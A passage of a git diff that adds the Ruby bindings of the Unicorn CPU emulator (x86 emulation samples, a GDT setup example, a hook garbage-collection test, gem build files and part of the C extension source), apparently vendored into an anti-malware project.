HOOK_MEM_INVALID) + + begin + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_WRITE.bytesize) + rescue UcError => e + puts "ERROR: %s" % e + end + + # now print out some registers + puts ">>> Emulation done. Below is the CPU context" + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_edx = mu.reg_read(UC_X86_REG_EDX) + puts ">>> ECX = 0x%x" % r_ecx + puts ">>> EDX = 0x%x" % r_edx + + begin + # read from memory + print ">>> Read 4 bytes from [0x%x] = " % (0xaaaaaaaa) + tmp = mu.mem_read(0xaaaaaaaa, 4) + tmp.each_byte { |i| print(" 0x%x" % i) } + puts + + print ">>> Read 4 bytes from [0x%x] = " % 0xffffffaa + tmp = mu.mem_read(0xffffffaa, 4) + tmp.each_byte { |i| puts(" 0x%x" % i) } + puts + + rescue UcError => e + puts "ERROR: %s" % e + end + + rescue UcError => e + puts "ERROR: %s" % e + end +end + +def test_i386_context_save() + + puts("Save/restore CPU context in opaque blob") + address = 0 + code = '\x40' # inc eax + begin + # Initialize emulator + mu = Uc.new UC_ARCH_X86, UC_MODE_32 + + # map 8KB memory for this emulation + mu.mem_map(address, 8 * 1024, UC_PROT_ALL) + + # write machine code to be emulated to memory + mu.mem_write(address, code) + + # set eax to 1 + mu.reg_write(UC_X86_REG_EAX, 1) + + puts(">>> Running emulation for the first time") + mu.emu_start(address, address+1) + + puts(">>> Emulation done. Below is the CPU context") + puts(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) + puts(">>> Saving CPU context") + saved_context = mu.context_save() + + puts(">>> Running emulation for the second time") + mu.emu_start(address, address+1) + puts(">>> Emulation done. Below is the CPU context") + puts(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) + + puts(">>> CPU context restored. Below is the CPU context") + mu.context_restore(saved_context) + puts(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) + + rescue UcError => e + puts("ERROR: %s" % e) + end + +end + +# Test X86 32 bit with IN/OUT instruction +def test_i386_inout() + puts("Emulate i386 code with IN/OUT instructions") + begin + # Initialize emulator in X86-32bit mode + mu = Uc.new UC_ARCH_X86, UC_MODE_32 + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_INOUT) + + # initialize machine registers + mu.reg_write(UC_X86_REG_EAX, 0x1234) + mu.reg_write(UC_X86_REG_ECX, 0x6789) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, HOOK_BLOCK) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, HOOK_CODE) + + # handle IN & OUT instruction + mu.hook_add(UC_HOOK_INSN, HOOK_IN, nil, 1, 0, UC_X86_INS_IN) + mu.hook_add(UC_HOOK_INSN, HOOK_OUT, nil, 1, 0, UC_X86_INS_OUT) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + X86_CODE32_INOUT.bytesize) + + # now print out some registers + puts(">>> Emulation done. Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_eax = mu.reg_read(UC_X86_REG_EAX) + puts ">>> EAX = 0x%x" % r_eax + puts ">>> ECX = 0x%x" % r_ecx + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +def test_x86_64() + puts("Emulate x86_64 code") + begin + # Initialize emulator in X86-64bit mode + mu = Uc.new UC_ARCH_X86, UC_MODE_64 + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE64) + + # initialize machine registers + mu.reg_write(UC_X86_REG_RAX, 0x71f3029efd49d41d) + mu.reg_write(UC_X86_REG_RBX, 0xd87b45277f133ddb) + mu.reg_write(UC_X86_REG_RCX, 0xab40d1ffd8afc461) + mu.reg_write(UC_X86_REG_RDX, 0x919317b4a733f01) + mu.reg_write(UC_X86_REG_RSI, 0x4c24e753a17ea358) + mu.reg_write(UC_X86_REG_RDI, 0xe509a57d2571ce96) + mu.reg_write(UC_X86_REG_R8, 0xea5b108cc2b9ab1f) + mu.reg_write(UC_X86_REG_R9, 0x19ec097c8eb618c1) + mu.reg_write(UC_X86_REG_R10, 0xec45774f00c5f682) + mu.reg_write(UC_X86_REG_R11, 0xe17e9dbec8c074aa) + mu.reg_write(UC_X86_REG_R12, 0x80f86a8dc0f6d457) + mu.reg_write(UC_X86_REG_R13, 0x48288ca5671c5492) + mu.reg_write(UC_X86_REG_R14, 0x595f72f6e4017f6e) + mu.reg_write(UC_X86_REG_R15, 0x1efd97aea331cccc) + + # setup stack + mu.reg_write(UC_X86_REG_RSP, ADDRESS + 0x200000) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, HOOK_BLOCK) + + # tracing all instructions in range [ADDRESS, ADDRESS+20] + mu.hook_add(UC_HOOK_CODE, HOOK_CODE, 0, ADDRESS, ADDRESS+20) + + # tracing all memory READ & WRITE access + mu.hook_add(UC_HOOK_MEM_WRITE, HOOK_MEM_ACCESS) + mu.hook_add(UC_HOOK_MEM_READ, HOOK_MEM_ACCESS) + # actually you can also use READ_WRITE to trace all memory access + #mu.hook_add(UC_HOOK_MEM_READ | UC_HOOK_MEM_WRITE, hook_mem_access) + + begin + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + X86_CODE64.bytesize) + rescue UcError => e + puts("ERROR: %s" % e) + end + # now print out some registers + puts(">>> Emulation done. Below is the CPU context") + rax = mu.reg_read(UC_X86_REG_RAX) + rbx = mu.reg_read(UC_X86_REG_RBX) + rcx = mu.reg_read(UC_X86_REG_RCX) + rdx = mu.reg_read(UC_X86_REG_RDX) + rsi = mu.reg_read(UC_X86_REG_RSI) + rdi = mu.reg_read(UC_X86_REG_RDI) + r8 = mu.reg_read(UC_X86_REG_R8) + r9 = mu.reg_read(UC_X86_REG_R9) + r10 = mu.reg_read(UC_X86_REG_R10) + r11 = mu.reg_read(UC_X86_REG_R11) + r12 = mu.reg_read(UC_X86_REG_R12) + r13 = mu.reg_read(UC_X86_REG_R13) + r14 = mu.reg_read(UC_X86_REG_R14) + r15 = mu.reg_read(UC_X86_REG_R15) + + puts(">>> RAX = %d" % rax) + puts(">>> RBX = %d" % rbx) + puts(">>> RCX = %d" % rcx) + puts(">>> RDX = %d" % rdx) + puts(">>> RSI = %d" % rsi) + puts(">>> RDI = %d" % rdi) + puts(">>> R8 = %d" % r8) + puts(">>> R9 = %d" % r9) + puts(">>> R10 = %d" % r10) + puts(">>> R11 = %d" % r11) + puts(">>> R12 = %d" % r12) + puts(">>> R13 = %d" % r13) + puts(">>> R14 = %d" % r14) + puts(">>> R15 = %d" % r15) + #BUG + mu.emu_start(ADDRESS, ADDRESS + X86_CODE64.bytesize) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +def test_x86_64_syscall() + puts("Emulate x86_64 code with 'syscall' instruction") + begin + # Initialize emulator in X86-64bit mode + mu = Uc.new UC_ARCH_X86, UC_MODE_64 + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE64_SYSCALL) + + hook_syscall = Proc.new do |mu, user_data| + rax = mu.reg_read(UC_X86_REG_RAX) + if rax == 0x100 + mu.reg_write(UC_X86_REG_RAX, 0x200) + else + puts('ERROR: was not expecting rax=%d in syscall' % rax) + end + end + + # hook interrupts for syscall + mu.hook_add(UC_HOOK_INSN, hook_syscall, nil, 1, 0, UC_X86_INS_SYSCALL) + + # syscall handler is expecting rax=0x100 + mu.reg_write(UC_X86_REG_RAX, 0x100) + + begin + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + X86_CODE64_SYSCALL.bytesize) + rescue UcError => e + puts("ERROR: %s" % e) + end + + # now print out some registers + puts(">>> Emulation done. Below is the CPU context") + + rax = mu.reg_read(UC_X86_REG_RAX) + puts(">>> RAX = 0x%x" % rax) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +def test_x86_16() + puts("Emulate x86 16-bit code") + begin + # Initialize emulator in X86-16bit mode + mu = Uc.new UC_ARCH_X86, UC_MODE_16 + + # map 8KB memory for this emulation + mu.mem_map(0, 8 * 1024) + + # set CPU registers + mu.reg_write(UC_X86_REG_EAX, 7) + mu.reg_write(UC_X86_REG_EBX, 5) + mu.reg_write(UC_X86_REG_ESI, 6) + + # write machine code to be emulated to memory + mu.mem_write(0, X86_CODE16) + + # emulate machine code in infinite time + mu.emu_start(0, X86_CODE16.bytesize) + + # now print out some registers + puts(">>> Emulation done. Below is the CPU context") + + tmp = mu.mem_read(11, 1) + puts("[0x%x] = 0x%x" % [11, tmp[0].ord]) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +test_i386() +puts("=" * 20) +test_i386_loop() +puts("=" * 20) +test_i386_invalid_mem_read() +puts("=" * 20) +test_i386_invalid_mem_write() +puts("=" * 20) +test_i386_context_save() +puts("=" * 20) +test_i386_inout() +puts("=" * 20) +test_x86_64() +puts("=" * 20) +test_x86_64_syscall() +puts("=" * 20) +test_x86_16() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_x86_gdt.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_x86_gdt.rb new file mode 100644 index 0000000..7aa6021 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_x86_gdt.rb @@ -0,0 +1,97 @@ +#!/usr/bin/env ruby +require 'unicorn_engine' +require 'unicorn_engine/x86_const' + +include UnicornEngine + +F_GRANULARITY = 0x8 +F_PROT_32 = 0x4 +F_LONG = 0x2 +F_AVAILABLE = 0x1 + +A_PRESENT = 0x80 + +A_PRIV_3 = 0x60 +A_PRIV_2 = 0x40 +A_PRIV_1 = 0x20 +A_PRIV_0 = 0x0 + +A_CODE = 0x8 +A_DATA = 0x0 +A_TSS = 0x0 +A_GATE = 0x0 + +A_DATA_WRITABLE = 0x2 +A_CODE_READABLE = 0x2 + +A_DIR_CON_BIT = 0x4 + +S_GDT = 0x0 +S_LDT = 0x4 +S_PRIV_3 = 0x3 +S_PRIV_2 = 0x2 +S_PRIV_1 = 0x1 +S_PRIV_0 = 0x0 + +def create_selector(idx, flags) + to_ret = flags + to_ret |= idx << 3 + return to_ret +end + +def create_gdt_entry(base, limit, access, flags) + + to_ret = limit & 0xffff; + to_ret |= (base & 0xffffff) << 16; + to_ret |= (access & 0xff) << 40; + to_ret |= ((limit >> 16) & 0xf) << 48; + to_ret |= (flags & 0xff) << 52; + to_ret |= ((base >> 24) & 0xff) << 56; + return [to_ret].pack('Q') +end + +def write_gdt(uc, gdt, mem) + gdt.each_index do |idx| + offset = idx * GDT_ENTRY_SIZE + uc.mem_write(mem + offset, gdt[idx]) + end +end + +CODE_ADDR = 0x40000 +CODE_SIZE = 0x1000 + +GDT_ADDR = 0x3000 +GDT_LIMIT = 0x1000 +GDT_ENTRY_SIZE = 0x8 + +GS_SEGMENT_ADDR = 0x5000 +GS_SEGMENT_SIZE = 0x1000 + +uc = Uc.new UC_ARCH_X86, UC_MODE_32 + +uc.mem_map(GDT_ADDR, GDT_LIMIT) +uc.mem_map(GS_SEGMENT_ADDR, GS_SEGMENT_SIZE) +uc.mem_map(CODE_ADDR, CODE_SIZE) + +gdt = Array.new (31) {|i| create_gdt_entry(0,0,0,0)} +gdt[15] = create_gdt_entry(GS_SEGMENT_ADDR, GS_SEGMENT_SIZE, A_PRESENT | A_DATA | A_DATA_WRITABLE | A_PRIV_3 | A_DIR_CON_BIT, F_PROT_32) +gdt[16] = create_gdt_entry(0, 0xfffff000 , A_PRESENT | A_DATA | A_DATA_WRITABLE | A_PRIV_3 | A_DIR_CON_BIT, F_PROT_32) # Data Segment +gdt[17] = create_gdt_entry(0, 0xfffff000 , A_PRESENT | A_CODE | A_CODE_READABLE | A_PRIV_3 | A_DIR_CON_BIT, F_PROT_32) # Code Segment +gdt[18] = create_gdt_entry(0, 0xfffff000 , A_PRESENT | A_DATA | A_DATA_WRITABLE | A_PRIV_0 | A_DIR_CON_BIT, F_PROT_32) # Stack Segment + +write_gdt(uc, gdt, GDT_ADDR) +uc.reg_write(UC_X86_REG_GDTR, [0, GDT_ADDR, gdt.length * GDT_ENTRY_SIZE-1, 0x0]) + +selector = create_selector(15, S_GDT | S_PRIV_3) +uc.reg_write(UC_X86_REG_GS, selector) + +selector = create_selector(16, S_GDT | S_PRIV_3) +uc.reg_write(UC_X86_REG_DS, selector) + +selector = create_selector(17, S_GDT | S_PRIV_3) +uc.reg_write(UC_X86_REG_CS, selector) + +selector = create_selector(18, S_GDT | S_PRIV_0) +uc.reg_write(UC_X86_REG_SS, selector) + + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/test_hook_gc.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/test_hook_gc.rb new file mode 100644 index 0000000..53593b6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/test_hook_gc.rb @@ -0,0 +1,60 @@ +#!/usr/bin/env ruby +require 'unicorn_engine' +require 'unicorn_engine/x86_const' +require 'weakref' + +include UnicornEngine + +X86_CODE32 = "\x41" # INC ecx; DEC edx + +# memory address where emulation starts +ADDRESS = 0x1000000 + +# callback for tracing instructions +hook_code = Proc.new do |uc, address, size, user_data| + puts("proc was run") +end + +hook_code_weak = WeakRef.new hook_code + +begin + # Initialize emulator in X86-32bit mode + mu = Uc.new UC_ARCH_X86, UC_MODE_32 + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + hook_code = nil # erase reference to proc + + GC.start() # force garbage collection to test if proc is garbage collected + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + X86_CODE32.bytesize) + + mu = nil # erase reference to Uc because apparently it doesn't go out of scope after this? +rescue UcError => e + puts("ERROR: %s" % e) + exit 1 +rescue NoMethodError => e + puts("proc was garbage collected and we tried to invoke `call` on something strange") + exit 1 +end + +GC.start() + +if hook_code_weak.weakref_alive?() then + puts("proc was not garbage collected") + exit 1 +end + +puts "test passed" +exit 0 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/Gemfile b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/Gemfile new file mode 100644 index 0000000..fa75df1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/Gemfile @@ -0,0 +1,3 @@ +source 'https://rubygems.org' + +gemspec diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/Rakefile b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/Rakefile new file mode 100644 index 0000000..43022f7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/Rakefile @@ -0,0 +1,2 @@ +require "bundler/gem_tasks" +task :default => :spec diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/extconf.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/extconf.rb new file mode 100644 index 0000000..d821f3d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/extconf.rb @@ -0,0 +1,8 @@ +require 'mkmf' + +extension_name = 'unicorn_engine' + +dir_config(extension_name) +have_library('unicorn') + +create_makefile(extension_name) diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/types.h b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/types.h new file mode 100644 index 0000000..15da7c8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/types.h @@ -0,0 +1,33 @@ +/* + +Ruby bindings for the Unicorn Emulator Engine + +Copyright(c) 2016 Sascha Schirra + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +typedef struct uc_x86_float80 { + uint64_t mantissa; + uint16_t exponent; +} uc_x86_float80; + + +struct hook { + uc_hook trace; + VALUE cb; + VALUE ud; + VALUE rUc; +}; diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/unicorn.c b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/unicorn.c new file mode 100644 index 0000000..bb7363f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/unicorn.c @@ -0,0 +1,589 @@ +/* + +Ruby bindings for the Unicorn Emulator Engine + +Copyright(c) 2016 Sascha Schirra + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ +#include "ruby.h" +#include <unicorn/unicorn.h> +#include <unicorn/x86.h> +#include "unicorn.h" +#include "types.h" + +VALUE UnicornModule = Qnil; +VALUE UcClass = Qnil; +VALUE UcError = Qnil; +VALUE SavedContext = Qnil; +VALUE Hook = Qnil; + + +void Init_unicorn_engine() { + rb_require("unicorn_engine/unicorn_const"); + UnicornModule = rb_define_module("UnicornEngine"); + UcError = rb_define_class_under(UnicornModule, "UcError", rb_eStandardError); + SavedContext = rb_define_class_under(UnicornModule, "SavedContext", rb_cObject); + Hook = rb_define_class_under(UnicornModule, "Hook", rb_cObject); + + UcClass = rb_define_class_under(UnicornModule, "Uc", rb_cObject); + rb_define_method(UcClass, "initialize", m_uc_initialize, 2); + rb_define_method(UcClass, "emu_start", m_uc_emu_start, -1); + rb_define_method(UcClass, "emu_stop", m_uc_emu_stop, 0); + rb_define_method(UcClass, "reg_read", m_uc_reg_read, 1); + rb_define_method(UcClass, "reg_write", m_uc_reg_write, 2); + rb_define_method(UcClass, "mem_read", m_uc_mem_read, 2); + rb_define_method(UcClass, "mem_write", m_uc_mem_write, 2); + rb_define_method(UcClass, "mem_map", m_uc_mem_map, -1); + rb_define_method(UcClass, "mem_unmap", m_uc_mem_unmap, 2); + rb_define_method(UcClass, "mem_protect", m_uc_mem_protect, 3); + rb_define_method(UcClass, "hook_add", m_uc_hook_add, -1); + rb_define_method(UcClass, "hook_del", m_uc_hook_del, 1); + rb_define_method(UcClass, "query", m_uc_query, 1); + rb_define_method(UcClass, "context_save", m_uc_context_save, 0); + rb_define_method(UcClass, "context_update", m_uc_context_update, 1); + rb_define_method(UcClass, "context_restore", m_uc_context_restore, 1); +} + +VALUE m_uc_initialize(VALUE self, VALUE arch, VALUE mode) { + uc_engine *_uc; + uc_err err; + err = uc_open(NUM2INT(arch), NUM2INT(mode), &_uc); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + + VALUE uc = Data_Wrap_Struct(UcClass, 0, uc_close, _uc); + rb_iv_set(self, "@uch", uc); + rb_iv_set(self, "@hooks", rb_ary_new()); + + return self; +} + +VALUE m_uc_emu_start(int argc, VALUE* argv, VALUE self){ + VALUE begin; + VALUE until; + VALUE timeout; + VALUE count; + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + + rb_scan_args(argc, argv, "22",&begin, &until, &timeout, &count); + if (NIL_P(timeout)) + timeout = INT2NUM(0); + + if (NIL_P(count)) + count = INT2NUM(0); + + err = uc_emu_start(_uc, NUM2ULL(begin), NUM2ULL(until), NUM2INT(timeout), NUM2INT(count)); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; +} + +VALUE m_uc_emu_stop(VALUE self){ + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + + err = uc_emu_stop(_uc); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; +} + +VALUE m_uc_reg_read(VALUE self, VALUE reg_id){ + uc_err err; + int32_t tmp_reg = NUM2INT(reg_id); + int64_t reg_value = 0; + VALUE to_ret; + uc_x86_mmr mmr; + uc_x86_float80 float80; + + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + + uc_arch arch; + uc_query(_uc, UC_QUERY_ARCH, &arch); + + if(arch == UC_ARCH_X86) { + switch(tmp_reg){ + case UC_X86_REG_GDTR: + case UC_X86_REG_IDTR: + case UC_X86_REG_LDTR: + case UC_X86_REG_TR: + mmr.selector = 0; + mmr.base = 0; + mmr.limit = 0; + mmr.flags = 0; + err = uc_reg_read(_uc, tmp_reg, &mmr); + + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + VALUE mmr_ary = rb_ary_new(); + reg_value = mmr.selector; + rb_ary_store(mmr_ary, 0, UINT2NUM(reg_value)); + rb_ary_store(mmr_ary, 1, ULL2NUM(mmr.base)); + rb_ary_store(mmr_ary, 2, UINT2NUM(mmr.limit)); + rb_ary_store(mmr_ary, 3, UINT2NUM(mmr.flags)); + return mmr_ary; + + case UC_X86_REG_FP0: + case UC_X86_REG_FP1: + case UC_X86_REG_FP2: + case UC_X86_REG_FP3: + case UC_X86_REG_FP4: + case UC_X86_REG_FP5: + case UC_X86_REG_FP6: + case UC_X86_REG_FP7: + float80.mantissa = 0; + float80.exponent = 0; + + err = uc_reg_read(_uc, tmp_reg, &float80); + + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + + VALUE float80_ary = rb_ary_new(); + + rb_ary_store(float80_ary, 0, ULL2NUM(float80.mantissa)); + rb_ary_store(float80_ary, 1, UINT2NUM(float80.exponent)); + + return float80_ary; + } + } + if(arch == UC_ARCH_ARM64) { + // V & Q registers are the same + if(tmp_reg >= UC_ARM64_REG_V0 && tmp_reg <= UC_ARM64_REG_V31) { + tmp_reg += UC_ARM64_REG_Q0 - UC_ARM64_REG_V0; + } + if(tmp_reg >= UC_ARM64_REG_Q0 && tmp_reg <= UC_ARM64_REG_Q31) { + uint64_t neon128_value[2]; + err = uc_reg_read(_uc, tmp_reg, &neon128_value); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + VALUE float128_ary = rb_ary_new(); + rb_ary_store(float128_ary, 0, ULL2NUM(neon128_value[0])); + rb_ary_store(float128_ary, 1, ULL2NUM(neon128_value[1])); + return float128_ary; + } + } + err = uc_reg_read(_uc, tmp_reg, ®_value); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return ULL2NUM(reg_value); +} + +VALUE m_uc_reg_write(VALUE self, VALUE reg_id, VALUE reg_value){ + uc_err err; + int32_t tmp_reg = NUM2INT(reg_id); + uc_x86_mmr mmr; + uc_x86_float80 float80; + int64_t tmp; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + + uc_arch arch; + uc_query(_uc, UC_QUERY_ARCH, &arch); + + if(arch == UC_ARCH_X86) { + switch(tmp_reg){ + case UC_X86_REG_GDTR: + case UC_X86_REG_IDTR: + case UC_X86_REG_LDTR: + case UC_X86_REG_TR: + Check_Type(reg_value, T_ARRAY); + + mmr.selector = NUM2USHORT(rb_ary_entry(reg_value,0)); + mmr.base = NUM2ULL(rb_ary_entry(reg_value,1)); + mmr.limit = NUM2UINT(rb_ary_entry(reg_value,2)); + mmr.flags = NUM2UINT(rb_ary_entry(reg_value,3)); + err = uc_reg_write(_uc, tmp_reg, &mmr); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; + + case UC_X86_REG_FP0: + case UC_X86_REG_FP1: + case UC_X86_REG_FP2: + case UC_X86_REG_FP3: + case UC_X86_REG_FP4: + case UC_X86_REG_FP5: + case UC_X86_REG_FP6: + case UC_X86_REG_FP7: + Check_Type(reg_value, T_ARRAY); + + float80.mantissa = NUM2ULL(rb_ary_entry(reg_value,0)); + float80.exponent = NUM2USHORT(rb_ary_entry(reg_value,1)); + + err = uc_reg_write(_uc, tmp_reg, &float80); + + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + + return Qnil; + } + } + if(arch == UC_ARCH_ARM64) { + // V & Q registers are the same + if(tmp_reg >= UC_ARM64_REG_V0 && tmp_reg <= UC_ARM64_REG_V31) { + tmp_reg += UC_ARM64_REG_Q0 - UC_ARM64_REG_V0; + } + if(tmp_reg >= UC_ARM64_REG_Q0 && tmp_reg <= UC_ARM64_REG_Q31) { + Check_Type(reg_value, T_ARRAY); + + uint64_t neon128_value[2]; + neon128_value[0] = NUM2ULL(rb_ary_entry(reg_value, 0)); + neon128_value[1] = NUM2ULL(rb_ary_entry(reg_value, 1)); + err = uc_reg_write(_uc, NUM2INT(reg_id), &neon128_value); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; + } + } + + tmp = NUM2ULL(reg_value); + err = uc_reg_write(_uc, NUM2INT(reg_id), &tmp); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; +} + +VALUE m_uc_mem_read(VALUE self, VALUE address, VALUE size){ + size_t isize = NUM2UINT(size); + uint8_t bytes[isize]; + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + + err = uc_mem_read(_uc, NUM2ULL(address), &bytes, isize); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return rb_str_new(bytes, isize); +} + +VALUE m_uc_mem_write(VALUE self, VALUE address, VALUE bytes){ + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + err = uc_mem_write(_uc, NUM2ULL(address), StringValuePtr(bytes), RSTRING_LEN(bytes)); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; +} + +VALUE m_uc_mem_map(int argc, VALUE* argv, VALUE self){ + uc_err err; + VALUE address; + VALUE size; + VALUE perms; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + rb_scan_args(argc, argv, "21",&address, &size, &perms); + if (NIL_P(perms)) + perms = INT2NUM(UC_PROT_ALL); + + err = uc_mem_map(_uc, NUM2ULL(address), NUM2UINT(size), NUM2UINT(perms)); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; +} + +VALUE m_uc_mem_unmap(VALUE self, VALUE address, VALUE size){ + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc); + err = uc_mem_unmap(_uc, NUM2ULL(address), NUM2UINT(size)); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; +} + +VALUE m_uc_mem_protect(VALUE self, VALUE address, VALUE size, VALUE perms){ + uc_err err; + uc_engine *_uc; + Data_Get_Struct(rb_iv_get(self,"@uch"), uc_engine, _uc); + err = uc_mem_protect(_uc, NUM2ULL(address), NUM2UINT(size), NUM2UINT(perms)); + if (err != UC_ERR_OK) { + rb_raise(UcError, "%s", uc_strerror(err)); + } + return Qnil; +} + +static void cb_hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data){ + struct hook *hook = (struct hook *)user_data; + VALUE cb; + VALUE ud; + VALUE rUc; + + cb = hook->cb; + ud = hook->ud; + rUc = hook->rUc; + rb_funcall(cb, rb_intern("call"), 4, rUc, ULL2NUM(address), UINT2NUM(size), ud); +} + +static void cb_hook_mem_access(uc_engine *uc, uint32_t access, uint64_t address, uint32_t size, int64_t value, void *user_data){ + struct hook *hook = (struct hook *)user_data; + VALUE cb; + VALUE ud; + VALUE rUc; + + cb = hook->cb; + ud = hook->ud; + rUc = hook->rUc; + rb_funcall(cb, rb_intern("call"), 6, rUc, UINT2NUM(access), ULL2NUM(address), UINT2NUM(size), LL2NUM(value), ud); +} + +static bool cb_hook_mem_invalid(uc_engine *uc, uint32_t access, uint64_t address, uint32_t size, int64_t value, void *user_data){ + struct hook *hook = (struct hook *)user_data; + VALUE cb; + VALUE ud; + VALUE rUc; + + cb = hook->cb; + ud = hook->ud; + rUc = hook->rUc; + + return RTEST(rb_funcall(cb, rb_intern("call"), 6, rUc, UINT2NUM(access), ULL2NUM(address), UINT2NUM(size), LL2NUM(value), ud)); +} + +static uint32_t cb_hook_insn_in(uc_engine *uc, uint32_t port, int size, void *user_data){ + struct hook *hook = (struct hook *)user_data; + VALUE cb; + VALUE ud; + VALUE rUc; + + cb = hook->cb; + ud = hook->ud; + rUc = hook->rUc; + return NUM2UINT(rb_funcall(cb, 